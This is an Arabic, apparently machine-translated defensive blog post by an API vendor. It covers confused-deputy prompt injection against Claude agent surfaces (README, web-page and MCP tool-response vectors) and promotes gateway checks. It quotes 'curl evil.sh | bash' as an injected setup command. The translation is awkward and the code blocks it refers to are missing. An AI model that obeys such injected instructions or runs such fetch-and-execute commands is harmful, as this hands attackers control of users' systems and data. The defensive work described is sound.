كلود مرتبك - نائب مصفوفة التدقيق: 4 نقاط عمياء، 3 حواجز حماية
نشرت أربعة فرق بحثية نتائج الحقن الفوري لكلود في الفترة ما بين 6 و7 مايو 2026. يمكنك شحن مصفوفة تدقيق تحدد كل نقطة عمياء إلى حاجز حماية خرساني (التحقق من عنوان URL، ومسح PII، والقائمة المسموح بها للصدفة) هذا الأسبوع.
بين 6 و7 مايو 2026، نشرت أربع فرق بحثية منفصلة نتائج حول كلود فورنت حقن. تعاملت معظم التغطية معهم على أنهم ثلاث قصص مختلفة. إنهما نفس القصة: أ مشكلة نائب مرتبك حيث ينفذ كلود إجراءات نيابة عن المهاجم الذي يتحكم محتوى غير موثوق به في نافذة السياق الخاصة به.
يمكن لـ README في الريبو المستنسخ تشغيل أوامر Shell من خلال Claude Code. صفحة ويب في كلود إن يستطيع Chrome إقناع الوكيل بإحضار عناوين URL الخاصة بالمهاجم. يمكن لاستجابة أداة MCP إدخال التعليمات أن استدعاء الأداة التالية يطيع. النموذج يفعل ما قيل له؛ المشكلة هي النموذج لا أستطيع معرفة من يقوم بالإخبار.
الدفاعات الجزئية للسفن الإنسانية (مطالبات الإذن في Claude Code، وتأكيدات الإجراء في كلود في كروم). الباقي لك. فيما يلي مصفوفة التدقيق التي تحدد كل نقطة عمياء إلى أ يمكنك وضع حاجز حماية خرساني وفحص API بمكالمة واحدة في بوابة MCP الخاصة بك اليوم.
النقاط العمياء الأربع
| سطح | ناقل الهجوم | ما يدير | الدرابزين الأصلي |
|---|---|---|---|
| كلود كود | التمهيدي المسموم، الحزمة postinstallأو git Commit Body |
أمر شل، كتابة الملف، دفع جيت | موجه الإذن |
| كلود في كروم | تعليمات صفحة الويب متنكرة في شكل طلبات المستخدم | انقر، أرسل النموذج، اتبع الرابط | تأكيد الإجراء |
| كلود سطح المكتب + MCP | استجابة الأداة تحمل تعليمات للمكالمة التالية | استدعاء أداة MCP المتسلسلة وقراءة الملف وجلب الشبكة | مربع حوار الموافقة على الأداة |
واجهة برمجة التطبيقات tool_use |
سلسلة غير موثوقة داخل كتلة نتائج الأداة | مهما كان ما يقرره الدور التالي | لا شيء افتراضيا |
يلتقط كل حاجز حماية أصلي الحالة الواضحة (أمر الصدفة الذي لم يطلبه المستخدم) و يفتقد الجزء الدقيق (تجعيد "غير ضار" لمضيف مشابه لم يره المستخدم من قبل). الإصلاح هو الدفاع بعمق عند طبقة الأداة، وليس عند طبقة المطالبة.
حاجز الحماية 1: التصيد الاحتيالي - التحقق من كل عنوان URL يلمسه الوكيل
التصعيد الأكثر شيوعًا بين النواب المرتبكين هو "قم بزيارة عنوان URL هذا وأخبرني بما يقوله". ال عنوان URL ينتمي إلى المهاجم. البيانات التي يقرأها الوكيل بعد ذلك هي الآن مدخلاته. تشغيل التصيد تحقق من كل عنوان URL لم يراه الوكيل في موجه المستخدم الأصلي:
يعد الملف القابل للتنفيذ الأولي المستضاف على جوهر مجهول بدون التزام مثبت أمرًا كلاسيكيًا
سلسلة التنفيذ من الحقن الفوري إلى الصدفة. يعود الحكم بعد أقل من 100 مللي ثانية؛ قمت بالتخزين المؤقت من خلال
تجزئة عنوان URL لمدة 10 دقائق؛ قمت بإسقاط مكالمات الأداة التي يكون حكمها أي شيء آخر غير
clean.
Guardrail 2: معلومات تحديد الهوية الشخصية (PII) والفحص السري لكل استجابة لأداة MCP
التصعيد الثاني هو تسمم استجابة الأداة. تقوم أداة MCP بإرجاع كائن ثنائي كبير بحجم 4 كيلو بايت JSON؛ في مكان ما في تلك النقطة عبارة عن سلسلة تعليمات. يقرأ كلود النقطة بأكملها وتفوز التعليمات. ال يمكن أن يقوم blob أيضًا بتسريب بيانات الاعتماد التي تم جمعها في مكان آخر، والتي تنتهي بعد ذلك في منطق النموذج تتبع وسجلات المحادثة الخاصة بك.
منع استجابة الأداة من الوصول إلى النموذج إذا كان يحمل بيانات اعتماد مباشرة. تنقيح رسائل البريد الإلكتروني والهواتف ما لم يطلبها المستخدم. التعامل مع كل خادم MCP على أنه غير موثوق به افتراضيًا؛ أنت لا أعرف من سمم مصدر البيانات المنبع.
Guardrail 3: قوائم المضيف الصلب والقوائم المسموح بها عند البوابة
التصعيد الثالث هو الذي يلدغ الشركات: عميل يوسع نطاقه بهدوء
الوصول. يقنع ملف README كلود كود بالتشغيل curl evil.sh | bash "للإعداد." أ
تقنع صفحة الويب Claude في Chrome بإرسال نموذج على نطاق مشابه. كلا الهجومين يموتان
مقابل القائمة المسموح بها الثابتة:
القائمة المسموح بها مملة. مملة هي النقطة. كل إجراء يخرج عن القائمة المسموح بها أيضًا يفشل على الفور أو يظهر مطالبة يجب على المستخدم قراءتها. يبقى الوكيل مفيدًا داخل رمل وغير ضارة خارجها.
بوابة MCP المكونة من 60 سطرًا والتي تربطها ببعضها البعض
تعيش جميع حواجز الحماية الثلاثة في وظيفة برمجية وسيطة واحدة تقع بين كلود وكل MCP الخادم. فهو يسحب عناوين URL من استجابات الأداة، ويتحقق منها مقابل مجموعة مضيفة موثوقة بالإضافة إلى أ القائمة المسموح بها للجلسة، وتشغيل فحص معلومات تحديد الهوية الشخصية (PII)، وإرجاع قرار الحظر المنظم إلى التطبيق المضيف يمكن أن تظهر للمستخدم:
تحتوي مجموعة المضيف الموثوق بها على واجهات برمجة التطبيقات الخاصة بك. تبدأ القائمة المسموح بها للجلسة فارغة وتنمو مع مرور الوقت يوافق المستخدم بشكل صريح على المضيفين أثناء الجلسة. التخزين المؤقت يحافظ على الشيك مجانيًا بشكل فعال تكرار عناوين URL (فكر في ترقيم الصفحات، وإعادة المحاولة، ونفس صفحة المستندات عبر استدعاءات الأداة).
إذا لم تتمكن من تشغيل بوابة بعد، فاستخدم الإصدار الرخيص: قم بتسجيل كل عنوان URL وكل أمر Shell يقترح الوكيل متجرًا منظمًا، وينبه إلى أي شيء يصيب مضيفًا لم تصل إليه تفويض مسبق. الكشف دون الوقاية لا يتفوق على أي منهما.
حيث يتناسب هذا مع وضعية الدفاع المتعمق
إن مصفوفة التدقيق ليست بديلاً عن عمل الأنثروبيك. إنها الطبقة التي تتحكم فيها. أ الانقسام المعقول:
- الأنثروبي يمتلك النموذج: قوة الحقن السريع، والتسلسل الهرمي للتعليمات التدريب، سلوك الرفض.
- أنت تملك سطح الأداة: التحقق من صحة عنوان URL، وتنقية معلومات تحديد الهوية الشخصية (PII)، والمضيف والصدفة القوائم المسموح بها، ومخزون خادم MCP.
- يمتلك IdP الخاص بك الهوية: الرموز قصيرة العمر للوكيل، لكل جلسة التدقيق، وبيانات اعتماد منفصلة عن المستخدم البشري.
تخطي أي طبقة وسيتضمن تقرير النائب المرتبك التالي الحادث الخاص بك. البحث 6-7 مايو عبارة عن معاينة مجانية لما يحتاج كل فريق إلى إرساله قبل أن تصبح هذه دورة إخبارية ربع سنوية.
الوجبات السريعة الرئيسية
- أربع نقاط عمياء، سبب جذري واحد. يتعامل كلود مع كل رمز على أنه محتمل تحمل التعليمات. المحتوى غير الموثوق به في السياق هو ناقل عمل، وليس قراءة سلبية.
- التحقق من التصيد الاحتيالي لعنوان URL لكل عنوان URL مقترح بواسطة الأداة. استدعاء واحد لواجهة برمجة التطبيقات (API)، 100 مللي ثانية، مخبأة. يسقط سلسلة تصعيد الحقن السريع الأكثر شيوعًا.
- مسح معلومات تحديد الهوية الشخصية (PII) على كل استجابة لأداة MCP. يمنع تسرب بيانات الاعتماد من خلال تؤدي الأداة إلى التسمم وتحفظ الأسرار خارج سجلات المحادثة.
- القوائم المسموح بها الصعبة عند البوابة. تقوم أوامر Shell والقوائم المسموح بها للمضيف بقتل تصعيد "توسيع نطاق الوصول بهدوء". مملة ومحدودة وفعالة.
- انقسام الدفاع في العمق. أنتروبيك تمتلك النموذج، وأنت تمتلك سطح الأداة، يمتلك IdP الخاص بك هوية. تخطي طبقة وسيقوم البحث التالي بإسقاط اسمك.
المعارض بوتوي /v1/phishing/check, /v1/pii/detect,
/v1/url-metadataوما يقرب من 200 نقطة نهاية أحادية الغرض خلف مفتاح واجهة برمجة التطبيقات (API) واحد
مع 5 متطلبات/دقيقة مجانية. قم بتوصيلهم ببوابة MCP الخاصة بك أو اتصل بهم من Claude Code نفسه عبر
ال خادم botoi MCP.
تصفح
مستندات تفاعلية
للبدء.
FAQ
- ما هي قضية كلود النائب الحائر؟
- يحدث هجوم النائب المشوش عندما تنفذ عملية ذات امتيازات (Claude Code، Claude in Chrome) إجراءات نيابة عن مهاجم يتحكم في جزء من مدخلاتها. في الفترة ما بين 6 و7 مايو 2026، نشرت أربعة فرق بحثية نتائج تظهر إمكانية خداع كلود لتشغيل أوامر shell، أو سحب البيانات، أو زيارة عناوين URL الخاصة بالمهاجم عندما يحمل محتوى غير موثوق به (ملف README، أو صفحة ويب، أو استجابة أداة MCP) تعليمات تشبه طلبات المستخدم.
- ما هي أسطح كلود المتأثرة؟
- Claude Code (وكيل CLI يقرأ ملفات الريبو)، Claude في Chrome (وكيل التصفح يقرأ صفحات الويب)، Claude Desktop مع خوادم MCP (استجابات الأداة يمكن أن تحمل التعليمات)، وواجهة برمجة التطبيقات (API) عندما تحتوي نتائج استخدام الأداة على سلاسل يتحكم فيها المهاجم. المشكلة الجذرية هي نفسها في جميع الحالات الأربعة: يتعامل كلود مع كل رمز مميز في السياق على أنه يحمل تعليمات محتملة.
- هل السفينة الأنثروبيه حواجز حماية لهذا؟
- نعم جزئيا. لدى Claude Code نظام أذونات للصدفة وكتابة الملفات. يحتوي Claude في Chrome على طبقة تأكيد الإجراء. ولا يمنع أي منهما المهاجم المصمم من ربط الحقن الفوري بالهندسة الاجتماعية. طبقة الدفاع المتعمق هي ملكك: تحقق من صحة كل عنوان URL يقترحه الوكيل، وافحص كل استجابة للأداة بحثًا عن بطاقات IOC، وقم بتحديد نصف قطر الانفجار في بوابة API.
- كيف يختلف هذا عن الحقن السريع العادي؟
- ينتهي الحقن الفوري الكلاسيكي عند إخراج النص. ينتهي النائب المرتبك عند الإجراء: يتم تشغيل أمر shell، ويتم جلب عنوان URL، ويتم تشغيل خطاف الويب، وتتحرك الأموال. يجب أن يكون الإصلاح موجودًا في مكان حدوث الإجراءات (طبقة الأداة)، وليس في مكان إنشاء النص (النموذج). ولهذا السبب فإن وكلاء حاجز الحماية والتحقق من صحة عنوان URL أكثر أهمية من التعزيز الفوري.
- ما هو الحد الأدنى الذي يجب أن أضيفه هذا الأسبوع؟
- ثلاثة أشياء. فحص تصيد عنوان URL قبل أن يقوم الوكيل بإحضار أو ربط أي مجال لم يراه في موجه المستخدم. معلومات تحديد الهوية الشخصية والفحص السري لكل استجابة لأداة MCP قبل أن تدخل سياق كلود. وقائمة مسموح بها لأوامر Shell أو مضيفي HTTP في طبقة البوابة. كل منها عبارة عن استدعاء API واحد وكتلة تكوين واحدة.
ابدأ البناء مع botoi
أكثر من 150 نقطة نهاية API للبحث ومعالجة النصوص وتوليد الصور وأدوات المطورين. باقة مجانية، بدون بطاقة ائتمان.